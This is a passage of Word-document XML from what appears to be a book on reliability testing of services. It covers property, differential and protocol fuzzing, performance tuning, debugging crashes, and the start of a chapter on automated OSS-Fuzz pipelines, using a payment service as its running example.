        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Design execution schedules that balance thorough exploration with resource constraints. Run property testing during periods when CPU resources are available. Execute differential testing when memory capacity supports multiple service instances. Schedule protocol testing when network bandwidth can support high-volume message generation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Implement adaptive resource allocation that adjusts testing intensity based on available capacity and discovery rates. If property testing discovers many business logic violations, allocate additional resources to property exploration. If differential testing reveals behavioral inconsistencies, prioritize version comparison scenarios.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="171"/>
    <w:bookmarkStart w:id="172" w:name="Xe7ad9918518fcfbf436ef8327f56adb3f12f314"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Result Correlation and Comprehensive Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Multiple testing techniques generate diverse result formats that require intelligent correlation to extract actionable insights. Property violations, differential output mismatches, and protocol crashes might all indicate the same underlying reliability issue manifesting differently across testing approaches.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Build result correlation systems that identify relationships between findings across different testing techniques. A business logic property violation might correspond to a behavioral difference in differential testing and a specific protobuf message pattern in protocol testing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Develop pattern recognition that identifies systematic reliability issues rather than isolated edge cases. Multiple property violations with similar characteristics might indicate fundamental business logic problems. Consistent differential testing failures across multiple scenarios might reveal architectural issues that affect service evolution.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Create unified reporting that presents findings in business-relevant terms rather than technical testing artifacts. Instead of "Property P1 violated with input X," report "Payment processing allows duplicate charges under specific retry conditions." Instead of "Differential test D1 failed," report "New service version calculates discounts differently, affecting customer pricing."</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="172"/>
    <w:bookmarkStart w:id="173" w:name="Xdf4772335739c1f002bd89159236314dca95aef"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Advanced Integration Patterns for Complex Services</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Real-world services often involve complex scenarios that require sophisticated combinations of all three testing approaches. Consider a payment service that processes subscription billing: property testing verifies billing logic correctness, differential testing ensures billing consistency across service updates, and protocol testing validates billing communication reliability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Generate integrated test scenarios that combine techniques strategically. Use property testing to explore billing edge cases, apply differential testing to verify billing consistency across versions, and employ protocol testing to ensure billing communication handles edge case scenarios gracefully.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Design testing workflows that adapt technique combinations based on service characteristics and risk assessment. Critical payment processing endpoints receive comprehensive coverage from all three techniques. Administrative functionality might require only property testing for business logic verification. Internal service communication might focus on protocol testing with differential verification during updates.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="173"/>
    <w:bookmarkStart w:id="174" w:name="Xb44b34471987dfae429166d9f4f1a2cc6836bed"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Measuring Comprehensive Reliability Improvement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Track reliability metrics that reflect the business value of your comprehensive testing approach. Before implementing these techniques, your payment service might have experienced one customer-affecting incident per month: duplicate charges, pricing inconsistencies during deployments, or service crashes from edge case inputs. After implementation, track incident reduction rates—​ideally seeing 70-80% fewer reliability-related customer complaints.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Document specific reliability improvements from technique combinations. When property testing discovers a business logic bug that would have caused an estimated $15,000 in duplicate charges, note the prevented impact. When differential testing catches a behavioral change that would have broken integration with three dependent services, measure the avoided downtime hours. When protocol testing finds a crash that would have affected 20% of high-volume transactions, quantify the prevented customer experience degradation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Create reliability dashboards that demonstrate how comprehensive testing contributes to service uptime, customer experience, and operational efficiency. These metrics support investment in reliability testing infrastructure and validate the business value of advanced technique adoption.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="174"/>
    <w:bookmarkEnd w:id="175"/>
    <w:bookmarkStart w:id="179" w:name="X5f972474b43a5282f5f8182609a750208d5d2a8"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Performance Optimization and Scaling Advanced Techniques</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">As you implement comprehensive reliability testing with multiple advanced techniques, performance optimization becomes crucial for maintaining practical execution times and resource efficiency. Unoptimized advanced testing can consume excessive resources, take too long to provide actionable feedback, and overwhelm development workflows with result volume.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Understanding performance characteristics and optimization opportunities for each technique enables you to design testing campaigns that balance thoroughness with practical constraints. Different techniques exhibit different performance bottlenecks and respond to different optimization strategies.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="176" w:name="X712c9471c0ba18132128b6adb240fcce352ff85"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Property Testing Performance Optimization</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">FuzzTest property verification can consume significant CPU resources during extensive exploration, particularly for complex business logic that requires expensive calculations or external service interactions. Property execution performance directly affects exploration depth and discovery effectiveness.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Optimize property testing by focusing exploration on high-value input spaces, implementing efficient property verification logic, and using intelligent exploration strategies that maximize discovery per computation unit spent.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Profile property execution to identify computational bottlenecks. Properties that involve complex mathematical calculations might benefit from optimized algorithms or cached computations. Properties that interact with external services might need mocking or simulation to reduce execution time.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Implement incremental property verification that reuses computation across related test cases. If multiple test cases require similar business logic calculations, cache intermediate results to avoid redundant computation. Use property verification patterns that minimize expensive operations while maintaining exploration effectiveness.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="176"/>
    <w:bookmarkStart w:id="177" w:name="X15035d412bb5eb7bf34d4903a05ddfd60d1d541"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Differential Testing Resource Management</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Differential testing requires running multiple service instances simultaneously, potentially doubling or tripling resource requirements compared to single-service testing. Efficient resource management becomes essential for practical differential testing execution.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Optimize differential testing through intelligent instance management, shared resource utilization, and efficient comparison algorithms that minimize computational overhead while maintaining comparison accuracy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use containerization strategies that minimize resource overhead through shared base images, efficient layer caching, and optimized container configurations. Implement service instance pooling that reuses running instances across multiple test scenarios rather than creating new instances for each comparison.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Design comparison algorithms that focus on business-relevant differences while minimizing computational complexity. Use efficient data structures for difference detection, implement early termination for obvious mismatches, and parallelize comparison operations when beneficial.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="177"/>
    <w:bookmarkStart w:id="178" w:name="X6c4fac62f57031b24d2068ecdf922d6a73a0c2b"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Protocol Testing Throughput Optimization</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Protocol fuzzing throughput directly affects exploration depth and vulnerability discovery effectiveness. Optimize protocol testing through efficient message generation, optimized network communication, and intelligent mutation strategies that maximize exploration coverage.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Implement message generation strategies that balance mutation effectiveness with generation efficiency. Use protocol-aware mutation that produces higher-quality test cases with less computational overhead. Cache frequently used message components to reduce generation time.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Optimize network communication through connection pooling, efficient serialization, and intelligent batching that reduces network overhead while maintaining test case diversity. Use asynchronous communication patterns that maximize network utilization without overwhelming target services.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="178"/>
    <w:bookmarkEnd w:id="179"/>
    <w:bookmarkStart w:id="183" w:name="X61a447e0d733825e472e261f9054eecb0877d35"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Troubleshooting and Debugging Advanced Techniques</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Advanced reliability testing techniques introduce new categories of problems that require specialized troubleshooting approaches. Property test failures, differential testing mismatches, and protocol fuzzing crashes each present different debugging challenges that benefit from systematic investigation methodologies.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Understanding common failure patterns and debugging techniques for each advanced approach enables you to resolve issues quickly and maintain testing effectiveness. Different techniques fail in different ways and require different diagnostic approaches.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="180" w:name="X6c805f9c832067269ad1e4d7739efa3d622abe2"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Debugging Property Test Failures</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Property test failures can indicate genuine business logic bugs, incorrect property definitions, or testing environment issues that require different resolution approaches. Systematic debugging helps distinguish between actual reliability issues and testing configuration problems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">When FuzzTest reports property violations, begin investigation by examining the specific input scenario that triggered the failure. Property violations provide exact reproduction cases, but understanding why the property failed requires analyzing business logic execution under those specific conditions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Analyze property failure patterns to identify systematic issues versus isolated edge cases. Multiple property failures with similar input characteristics might indicate fundamental business logic problems. Random property failures might suggest race conditions or non-deterministic behavior in business logic implementation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Verify property definitions accurately represent business requirements. Sometimes property failures indicate overly restrictive property definitions rather than actual business logic bugs. Review property specifications with business stakeholders to ensure testing accurately reflects intended behavior.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="180"/>
    <w:bookmarkStart w:id="181" w:name="X44c29469bacbcaa3f70df367caa47d046379c8b"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Differential Testing Mismatch Investigation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Differential testing mismatches require careful investigation to determine whether differences represent genuine problems, acceptable implementation variations, or testing configuration issues. Not all differences indicate reliability problems that need resolution.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Begin differential testing investigation by categorizing the type of difference detected: functional behavior changes, performance variations, output format differences, or error handling modifications. Different categories require different evaluation approaches and resolution strategies.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Evaluate business impact of detected differences. Functional behavior changes that affect customer experience require immediate attention. Performance variations within acceptable ranges might not need resolution. Output format changes that break client compatibility represent integration failures that need fixing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Document acceptable difference patterns to reduce future false positive alerts. Establish difference tolerance thresholds based on business requirements and customer impact assessment. Create difference whitelisting for known acceptable implementation variations.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="181"/>
    <w:bookmarkStart w:id="182" w:name="Xf3c57e09d9167f927afcc10e1a46822eaaf1642"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Protocol Testing Crash Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Protocol fuzzing crashes require specialized analysis techniques to understand the underlying parsing vulnerabilities and assess their security and reliability implications. Different crash types indicate different vulnerability categories with varying severity levels.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Analyze protocol crashes using debugging tools that provide detailed execution context: memory corruption detection, stack trace analysis, and input correlation that identifies the specific message patterns triggering crashes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Categorize crashes by vulnerability type: buffer overflows, infinite loops, memory exhaustion, or logic errors. Different vulnerability types require different fix approaches and have different security implications for production deployment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Minimize crashing inputs to identify the specific message components responsible for triggering vulnerabilities. Reduce complex crashing messages to minimal reproduction cases that isolate the exact parsing logic causing failures.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="182"/>
    <w:bookmarkEnd w:id="183"/>
    <w:bookmarkStart w:id="187" w:name="Xb2be2ef850462756756e3c2e2a690967330ed64"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Chapter Conclusion: From Advanced Techniques to Comprehensive Service Reliability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your payment service has evolved from an unreliable service with frequent crashes into a thoroughly tested service that maintains correctness under many conditions. Property testing helps prevent business logic failures that would cause duplicate charges and account balance corruption. Differential testing helps ensure consistent behavior across service versions and can prevent integration failures during deployments. Protocol testing can discover communication reliability issues that would cause service outages during network edge cases.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Most importantly, these advanced techniques integrate seamlessly with your existing AFL++ and input validation expertise. The same Docker containers that prevented memory corruption and input processing crashes now verify business logic correctness and communication reliability. Your systematic exploration skills have expanded from crash discovery to comprehensive reliability verification.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="184" w:name="X989d4e70c5c3f8a4142102cc8b9a81cabea9af1"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Reliability Transformation Through Systematic Testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your service’s reliability transformation tells a compelling story. Three months ago: memory corruption crashes every few days, JSON parsing failures during input validation, business logic bugs causing duplicate payments, service inconsistencies breaking client integrations during deployments, and protocol-level crashes during high load scenarios.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Today: AFL++ eliminated memory corruption, input validation testing caught processing edge cases, property testing prevents business logic violations, differential testing ensures deployment consistency, and protocol testing handles communication edge cases gracefully. The transformation isn’t just technical—​it’s operational. Your on-call rotation deals with fewer critical incidents. Customer support receives fewer payment-related complaints. Your team deploys updates with confidence rather than anxiety.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Track specific reliability improvements that demonstrate business value: 85% reduction in payment-related customer complaints, 60% fewer deployment rollbacks due to behavioral inconsistencies, zero service outages from protocol-level parsing failures in the past two months. These metrics tell the story of comprehensive reliability improvement through systematic testing.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="184"/>
    <w:bookmarkStart w:id="185" w:name="X5b16e3fde347b95e0fcde6a0f9da407e8ea2d5e"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Integration Strategy for Maximum Reliability Coverage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The most effective reliability testing combines all techniques strategically based on service risk profiles and failure impact patterns. Critical payment processing endpoints receive comprehensive coverage from all three techniques. Administrative functionality might require only property testing for business logic verification. Internal service communication might focus on protocol testing with differential verification during updates.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your Docker-based testing infrastructure now supports comprehensive reliability workflows that scale from individual development to production monitoring. The same container configurations work for local testing during development, automated validation during code review, and continuous verification in staging environments.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Consider how these techniques have significantly improved your approach to service reliability. Instead of reactive debugging after customer-affecting incidents, you have proactive verification that can catch sophisticated failures before production deployment. Instead of manual testing that covers only obvious scenarios, you have systematic exploration that can discover edge cases in business logic, service consistency, and communication protocols.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="185"/>
    <w:bookmarkStart w:id="186" w:name="Xd0cb6e5dea91c93b35fd669162fa3fe256a4c6c"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your Journey Continues: From Individual Mastery to Ecosystem Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You now possess advanced reliability testing capabilities that can help prevent many customer-affecting service failures. Individual service reliability mastery provides excellent value, but maximum impact requires applying these techniques across service ecosystems, programming languages, and organizational processes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Part II of this book addresses multi-language application of the techniques you’ve mastered. The same property testing, differential testing, and protocol fuzzing approaches work across Java, Python, Go, and JavaScript services with language-specific adaptations. Your Docker-first infrastructure and systematic exploration expertise transfer directly to polyglot service architectures.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Part III focuses on organizational scaling that transforms individual reliability testing success into enterprise programs that improve service quality systematically. The comprehensive testing approaches you’ve developed for individual services become templates for organization-wide reliability capabilities that serve multiple development teams simultaneously.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your next challenge involves choosing which services in your organization would benefit most from immediate advanced reliability testing application. Start with services where business logic failures, version inconsistencies, or communication problems have caused customer-affecting incidents. Use demonstrable reliability improvements to build organizational support for broader advanced testing adoption.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The journey continues with language-specific reliability testing that applies your comprehensive approach across diverse technology stacks, followed by organizational scaling that makes advanced reliability testing accessible to entire engineering organizations.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="186"/>
    <w:bookmarkEnd w:id="187"/>
    <w:bookmarkEnd w:id="188"/>
    <w:bookmarkStart w:id="201" w:name="X8031eebe26ee1552effd3e490ed63cf4bce91a0"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Chapter 8: Automated Reliability Testing Pipelines</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Scale fuzzing from individual techniques to organizational reliability programs using OSS-Fuzz</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Tool Requirements:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Docker, OSS-Fuzz containers, Git repositories, GitHub Actions/Jenkins, container registries</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Learning Objectives:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1010"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Deploy private OSS-Fuzz instances for continuous organizational reliability testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1010"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Build decision frameworks for what, when, and how to fuzz at enterprise scale</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1010"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Create hybrid automation combining immediate CI feedback with comprehensive OSS-Fuzz coverage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1010"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Establish sustainable reliability testing programs that scale across teams and repositories</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Reliability Failures Prevented:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1011"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Regression introduction causing previously fixed crashes to reappear in production</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1011"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Performance degradation from algorithmic complexity changes affecting service availability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1011"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Memory leak accumulation causing long-term service instability and eventual outages</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1011"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Input validation failures allowing crash-inducing data through service boundaries</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1011"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Resource exhaustion scenarios developing over extended runtime periods causing service degradation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You’ve mastered AFL++, libFuzzer variants, and targeted fuzzing techniques across multiple programming languages. Now you face the organizational challenge: how do you deploy these techniques systematically across hundreds of repositories, dozens of teams, and constantly evolving service architectures without creating maintenance burdens that undermine effectiveness?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The answer lies in understanding OSS-Fuzz not as another fuzzing tool, but as a complete automation framework for organizational reliability testing. OSS-Fuzz provides the infrastructure, coordination mechanisms, and operational patterns that major technology companies use to scale fuzzing from individual expertise to systematic organizational practice.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This chapter teaches you to deploy and operate OSS-Fuzz as your primary automation platform while using CI/CD integration for immediate feedback. You’ll learn strategic frameworks for prioritizing fuzzing coverage, coordinating resources across competing priorities, and measuring effectiveness at organizational scale.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The key insight: successful fuzzing automation requires dedicated infrastructure that operates independently of development CI/CD constraints while providing integration points that enhance existing workflows. OSS-Fuzz provides this infrastructure with proven operational patterns refined through years of deployment at Google and thousands of open source projects.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="189" w:name="Xfbad0203821b0b84303f495d5c178de0d02be45"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Strategic Framework: When and What to Automate with OSS-Fuzz</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
